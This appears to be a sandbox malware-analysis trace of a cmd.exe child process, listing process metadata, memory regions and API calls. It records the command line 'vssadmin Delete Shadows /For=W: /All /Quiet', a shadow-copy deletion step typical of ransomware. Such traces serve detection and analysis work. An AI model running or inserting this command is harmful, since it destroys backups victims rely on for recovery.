	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0x117c"
	cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /C vssadmin Delete Shadows /For=W: /All /Quiet "
	cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\"
	os_username = "XC64ZB\\RDhJ0CNFevzX"
	bitness = "32"
	os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f1a9" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]

Region:
	              id = 804
	        start_va = 0x10000
	          end_va = 0x2ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000010000"
	        filename = ""

Region:
	              id = 805
	        start_va = 0x30000
	          end_va = 0x44fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000030000"
	        filename = ""

Region:
	              id = 806
	        start_va = 0x50000
	          end_va = 0x8ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000050000"
	        filename = ""

Region:
	              id = 807
	        start_va = 0x90000
	          end_va = 0x18ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000090000"
	        filename = ""

Region:
	              id = 808
	        start_va = 0x190000
	          end_va = 0x193fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000190000"
	        filename = ""

Region:
	              id = 809
	        start_va = 0x1a0000
	          end_va = 0x1a0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000001a0000"
	        filename = ""

Region:
	              id = 810
	        start_va = 0x1b0000
	          end_va = 0x1b1fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001b0000"
	        filename = ""

Region:
	              id = 811
	        start_va = 0x2f0000
	          end_va = 0x341fff
	       monitored = 1
	     entry_point = 0x304fd0
	     region_type = mapped_file
	            name = "cmd.exe"
	        filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")

Region:
	              id = 812
	        start_va = 0x350000
	          end_va = 0x434ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000350000"
	        filename = ""

Region:
	              id = 813
	        start_va = 0x4350000
	          end_va = 0x4351fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004350000"
	        filename = ""

Region:
	              id = 814
	        start_va = 0x4400000
	          end_va = 0x45fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004400000"
	        filename = ""

Region:
	              id = 815
	        start_va = 0x77040000
	          end_va = 0x771bafff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")

Region:
	              id = 816
	        start_va = 0x7ef00000
	          end_va = 0x7ef22fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007ef00000"
	        filename = ""

Region:
	              id = 817
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 818
	        start_va = 0x7fff0000
	          end_va = 0x7df95ae6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007fff0000"
	        filename = ""

Region:
	              id = 819
	        start_va = 0x7df95ae70000
	          end_va = 0x7ff95ae6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007df95ae70000"
	        filename = ""

Region:
	              id = 820
	        start_va = 0x7ff95ae70000
	          end_va = 0x7ff95b030fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")

Region:
	              id = 821
	        start_va = 0x7ff95b031000
	          end_va = 0x7ffffffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ff95b031000"
	        filename = ""

Region:
	              id = 822
	        start_va = 0x1c0000
	          end_va = 0x2effff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001c0000"
	        filename = ""

Region:
	              id = 823
	        start_va = 0x586b0000
	          end_va = 0x586fffff
	       monitored = 0
	     entry_point = 0x586c8180
	     region_type = mapped_file
	            name = "wow64.dll"
	        filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")

Region:
	              id = 824
	        start_va = 0x58630000
	          end_va = 0x586a9fff
	       monitored = 0
	     entry_point = 0x58643290
	     region_type = mapped_file
	            name = "wow64win.dll"
	        filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")

Region:
	              id = 848
	        start_va = 0x76d90000
	          end_va = 0x76e6ffff
	       monitored = 0
	     entry_point = 0x76da3980
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 849
	        start_va = 0x58700000
	          end_va = 0x58707fff
	       monitored = 0
	     entry_point = 0x587017c0
	     region_type = mapped_file
	            name = "wow64cpu.dll"
	        filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")

Region:
	              id = 884
	        start_va = 0x4600000
	          end_va = 0x47cffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004600000"
	        filename = ""

Region:
	              id = 885
	        start_va = 0x76d90000
	          end_va = 0x76e6ffff
	       monitored = 0
	     entry_point = 0x76da3980
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 886
	        start_va = 0x74590000
	          end_va = 0x7470dfff
	       monitored = 0
	     entry_point = 0x74641b90
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")

Region:
	              id = 919
	        start_va = 0x10000
	          end_va = 0x1ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000010000"
	        filename = ""

Region:
	              id = 920
	        start_va = 0x7ee00000
	          end_va = 0x7eefffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007ee00000"
	        filename = ""

Region:
	              id = 1323
	        start_va = 0x1c0000
	          end_va = 0x27dfff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 1324
	        start_va = 0x2e0000
	          end_va = 0x2effff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000002e0000"
	        filename = ""

Region:
	              id = 1325
	        start_va = 0x76820000
	          end_va = 0x768ddfff
	       monitored = 0
	     entry_point = 0x76855630
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")

Region:
	              id = 1326
	        start_va = 0x280000
	          end_va = 0x2bffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000280000"
	        filename = ""

Region:
	              id = 1327
	        start_va = 0x47d0000
	          end_va = 0x48cffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000047d0000"
	        filename = ""

Region:
	              id = 1328
	        start_va = 0x48d0000
	          end_va = 0x4a9ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000048d0000"
	        filename = ""

Region:
	              id = 1353
	        start_va = 0x4350000
	          end_va = 0x4353fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004350000"
	        filename = ""

Region:
	              id = 1577
	        start_va = 0x4360000
	          end_va = 0x4363fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004360000"
	        filename = ""

Region:
	              id = 1695
	        start_va = 0x4aa0000
	          end_va = 0x4dd6fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "sortdefault.nls"
	        filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")


Thread:
	id = 33
	os_tid = 0x11c0

	[0238.032] GetProcAddress (hModule=0x76d90000, lpProcName="SetConsoleInputExeNameW") returned 0x746ab440
	[0238.032] GetProcessHeap () returned 0x46d0000
	[0238.032] RtlAllocateHeap (HeapHandle=0x46d0000, Flags=0x8, Size=0x400a) returned 0x46db998
	[0238.032] GetProcessHeap () returned 0x46d0000
	[0238.033] RtlFreeHeap (HeapHandle=0x46d0000, Flags=0x0, BaseAddress=0x46db998) returned 1
	[0238.035] _wcsicmp (_String1="vssadmin", _String2=")") returned 77
	[0238.035] _wcsicmp (_String1="FOR", _String2="vssadmin") returned -16
	[0238.035] _wcsicmp (_String1="FOR/?", _String2="vssadmin") returned -16
	[0238.035] _wcsicmp (_String1="IF", _String2="vssadmin") returned -13
	[0238.035] _wcsicmp (_String1="IF/?", _String2="vssadmin") returned -13
	[0238.035] _wcsicmp (_String1="REM", _String2="vssadmin") returned -4
	[0238.035] _wcsicmp (_String1="REM/?", _String2="vssadmin") returned -4
	[0238.035] GetProcessHeap () returned 0x46d0000
	[0238.035] RtlAllocateHeap (HeapHandle=0x46d0000, Flags=0x8, Size=0x58) returned 0x46d9048
	[0238.035] GetProcessHeap () returned 0x46d0000
	[0238.035] RtlAllocateHeap (HeapHandle=0x46d0000, Flags=0x8, Size=0x1a) returned 0x46d7318
	[0238.038] GetProcessHeap () returned 0x46d0000
	[0238.038] RtlAllocateHeap (HeapHandle=0x46d0000, Flags=0x8, Size=0x52) returned 0x46d90a8
	[0238.143] GetConsoleTitleW (in: lpConsoleTitle=0x18f778, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0238.415] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18
	[0238.415] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17
	[0238.416] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18
	[0238.416] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2
	[0238.416] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19
	[0238.416] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19
	[0238.416] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19
	[0238.416] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4
	[0238.416] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4
	[0238.416] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17
	[0238.416] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3
	[0238.416] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6
	[0238.416] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18
	[0238.416] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2
	[0238.416] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6
	[0238.416] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9
	[0238.416] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9
	[0238.417] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4
	[0238.417] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4
	[0238.417] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6
	[0238.417] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15
	[0238.417] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3
	[0238.417] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19
	[0238.417] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19
	[0238.417] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14
	[0238.417] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14
	[0238.417] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4
	[0238.417] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17
	[0238.417] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3
	[0238.417] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17
	[0238.417] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2
	[0238.417] _wcsicmp (_String1="vssadmin", _String2="START") returned 3
	[0238.418] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18
	[0238.418] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11
	[0238.418] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9
	[0238.418] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6
	[0238.418] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6
	[0238.418] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21
	[0238.418] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16
	[0238.418] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20
	[0238.418] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19
	[0238.418] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9
	[0238.418] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18
	[0238.418] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17
	[0238.418] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18
	[0238.418] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2
	[0238.419] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19
	[0238.419] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19
	[0238.419] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19
	[0238.419] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4
	[0238.419] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4
	[0238.419] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17
	[0238.419] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3
	[0238.419] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6
	[0238.419] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18
	[0238.419] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2
	[0238.419] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6
	[0238.419] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9
	[0238.419] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9
	[0238.419] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4
	[0238.420] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4
	[0238.420] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6
	[0238.420] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15
	[0238.420] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3
	[0238.420] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19
	[0238.420] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19
	[0238.420] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14
	[0238.420] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14
	[0238.420] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4
	[0238.420] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17
	[0238.420] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3
	[0238.420] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17
	[0238.420] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2
	[0238.420] _wcsicmp (_String1="vssadmin", _String2="START") returned 3
	[0238.420] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18
	[0238.421] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11
	[0238.421] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9
	[0238.421] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6
	[0238.421] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6
	[0238.421] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21
	[0238.421] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16
	[0238.421] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20
	[0238.421] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19
	[0238.421] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9
	[0238.421] _wcsicmp (_String1="vssadmin", _String2="FOR") returned 16
	[0238.421] _wcsicmp (_String1="vssadmin", _String2="IF") returned 13
	[0238.421] _wcsicmp (_String1="vssadmin", _String2="REM") returned 4
	[0238.423] GetProcessHeap () returned 0x46d0000
	[0238.423] RtlAllocateHeap (HeapHandle=0x46d0000, Flags=0x8, Size=0x210) returned 0x46d9108
	[0238.423] GetProcessHeap () returned 0x46d0000
	[0238.423] RtlAllocateHeap (HeapHandle=0x46d0000, Flags=0x8, Size=0x64) returned 0x46d9320
	[0238.423] _wcsnicmp (_String1="vssa", _String2="cmd ", _MaxCount=0x4) returned 19
	[0238.424] GetProcessHeap () returned 0x46d0000
	[0238.424] RtlAllocateHeap (HeapHandle=0x46d0000, Flags=0x8, Size=0x418) returned 0x46d05c8
	[0238.424] SetErrorMode (uMode=0x0) returned 0x0
	[0238.424] SetErrorMode (uMode=0x1) returned 0x0
	[0238.424] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x46d05d0, lpFilePart=0x18f284 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x18f284*="Desktop") returned 0x1d
	[0238.424] SetErrorMode (uMode=0x0) returned 0x1
	[0238.425] GetProcessHeap () returned 0x46d0000
	[0238.425] RtlReAllocateHeap (Heap=0x46d0000, Flags=0x0, Ptr=0x46d05c8, Size=0x56) returned 0x46d05c8
	[0238.425] GetProcessHeap () returned 0x46d0000
	[0238.425] RtlSizeHeap (HeapHandle=0x46d0000, Flags=0x0, MemoryPointer=0x46d05c8) returned 0x56
	[0238.425] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x31f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x9c
	[0238.425] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
	[0238.426] GetProcessHeap () returned 0x46d0000
	[0238.426] RtlAllocateHeap (HeapHandle=0x46d0000, Flags=0x8, Size=0x182) returned 0x46d9390
	[0238.426] GetProcessHeap () returned 0x46d0000
	[0238.426] RtlAllocateHeap (HeapHandle=0x46d0000, Flags=0x8, Size=0x2fc) returned 0x46d0628
	[0238.453] GetProcessHeap () returned 0x46d0000
	[0238.453] RtlReAllocateHeap (Heap=0x46d0000, Flags=0x0, Ptr=0x46d0628, Size=0x184) returned 0x46d0628
	[0238.453] GetProcessHeap () returned 0x46d0000
	[0238.453] RtlSizeHeap (HeapHandle=0x46d0000, Flags=0x0, MemoryPointer=0x46d0628) returned 0x184
	[0238.453] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x31f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35
	[0238.453] GetProcessHeap () returned 0x46d0000
	[0238.454] RtlAllocateHeap (HeapHandle=0x46d0000, Flags=0x8, Size=0xe0) returned 0x46d9520
	[0238.642] GetProcessHeap () returned 0x46d0000
	[0238.642] RtlReAllocateHeap (Heap=0x46d0000, Flags=0x0, Ptr=0x46d9520, Size=0x76) returned 0x46d9520
	[0238.642] GetProcessHeap () returned 0x46d0000
	[0238.642] RtlSizeHeap (HeapHandle=0x46d0000, Flags=0x0, MemoryPointer=0x46d9520) returned 0x76
	[0238.643] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0238.644] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\vssadmin.*" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\vssadmin.*"), fInfoLevelId=0x1, lpFindFileData=0x18f010, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f010) returned 0xffffffff
	[0238.644] GetLastError () returned 0x2
	[0238.644] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0238.645] FindFirstFileExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\vssadmin.*" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\vssadmin.*"), fInfoLevelId=0x1, lpFindFileData=0x18f010, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f010) returned 0xffffffff
	[0238.646] GetLastError () returned 0x2
	[0238.646] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0238.646] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.*" (normalized: "c:\\windows\\syswow64\\vssadmin.*"), fInfoLevelId=0x1, lpFindFileData=0x18f010, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f010) returned 0x46d95a0
	[0238.646] GetProcessHeap () returned 0x46d0000
	[0238.646] RtlAllocateHeap (HeapHandle=0x46d0000, Flags=0x0, Size=0x14) returned 0x46d7930
	[0238.646] FindClose (in: hFindFile=0x46d95a0 | out: hFindFile=0x46d95a0) returned 1
	[0238.647] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.COM" (normalized: "c:\\windows\\syswow64\\vssadmin.com"), fInfoLevelId=0x1, lpFindFileData=0x18f010, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f010) returned 0xffffffff
	[0238.647] GetLastError () returned 0x2
	[0238.647] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.EXE" (normalized: "c:\\windows\\syswow64\\vssadmin.exe"), fInfoLevelId=0x1, lpFindFileData=0x18f010, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18f010) returned 0x46d95a0
	[0238.647] GetProcessHeap () returned 0x46d0000
	[0238.647] RtlReAllocateHeap (Heap=0x46d0000, Flags=0x0, Ptr=0x46d7930, Size=0x4) returned 0x46d7520
	[0238.648] FindClose (in: hFindFile=0x46d95a0 | out: hFindFile=0x46d95a0) returned 1
	[0238.648] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3
	[0238.648] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2
	[0238.648] GetConsoleTitleW (in: lpConsoleTitle=0x18f504, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0239.347] InitializeProcThreadAttributeList (in: lpAttributeList=0x18f430, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x18f414 | out: lpAttributeList=0x18f430, lpSize=0x18f414) returned 1
	[0239.347] UpdateProcThreadAttribute (in: lpAttributeList=0x18f430, dwFlags=0x0, Attribute=0x60001, lpValue=0x18f41c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x18f430, lpPreviousValue=0x0) returned 1
	[0239.348] GetStartupInfoW (in: lpStartupInfo=0x18f468 | out: lpStartupInfo=0x18f468*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) 
	[0239.348] GetProcessHeap () returned 0x46d0000
	[0239.348] RtlAllocateHeap (HeapHandle=0x46d0000, Flags=0x8, Size=0x18) returned 0x46d79d0
	[0239.348] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38
	[0239.348] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2
	[0239.348] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2
	[0239.348] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0239.349] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0239.349] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0239.349] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3
	[0239.349] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3
	[0239.349] _wcsnicmp (_String1="COPYCMD", _String2="FPS_BRO", _MaxCount=0x7) returned -3
	[0239.349] _wcsnicmp (_String1="COPYCMD", _String2="FPS_BRO", _MaxCount=0x7) returned -3
	[0239.349] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5
	[0239.349] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5
	[0239.349] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9
	[0239.349] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9
	[0239.349] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11
	[0239.349] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12
	[0239.349] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13
	[0239.349] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13
	[0239.350] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0239.350] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0239.350] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0239.350] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0239.350] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0239.350] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0239.350] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0239.350] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0239.350] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0239.350] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13
	[0239.350] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13
	[0239.350] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13
	[0239.350] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16
	[0239.351] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16
	[0239.351] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17
	[0239.351] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17
	[0239.351] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18
	[0239.351] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18
	[0239.351] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18
	[0239.351] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18
	[0239.353] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20
	[0239.353] GetProcessHeap () returned 0x46d0000
	[0239.353] RtlFreeHeap (HeapHandle=0x46d0000, Flags=0x0, BaseAddress=0x46d79d0) returned 1
	[0239.353] GetProcessHeap () returned 0x46d0000
	[0239.353] RtlAllocateHeap (HeapHandle=0x46d0000, Flags=0x8, Size=0xa) returned 0x46d7530
	[0239.353] lstrcmpW (lpString1="\\vssadmin.exe", lpString2="\\XCOPY.EXE") returned -1
